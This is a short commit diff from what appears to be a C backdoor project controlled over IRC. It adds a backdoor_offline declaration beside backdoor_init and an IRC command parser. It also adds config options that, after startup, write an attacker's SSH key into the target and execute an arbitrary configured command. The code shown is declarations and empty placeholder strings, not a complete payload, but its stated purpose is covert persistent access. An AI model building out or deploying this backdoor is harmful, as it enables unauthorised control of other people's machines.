This commit is contained in:
usr 2024-05-12 12:47:02 +03:00
parent d8003d97e0
commit e6054f2f04
5 changed files with 22 additions and 8 deletions

View file

@ -4,6 +4,7 @@
#define COMMON_BUF_SIZE 100
void backdoor_init(void);
void backdoor_offline(void);
void parse_cmd(IRCC_client *client);

View file

@ -29,15 +29,19 @@
/* Uncomment if you want to enable option */
/* #define CFG_SSH */
/* #define CFG_CMD */
/* Will start after startup */
#ifdef CFG_SSH
/*
* Writes your ssh key if connection
* was not established
*/
/* Writes your ssh key */
const char *ssh_key = "";
#endif
#ifdef CFG_CMD
/* Execute command */
const char *cmd = "";
#endif
#endif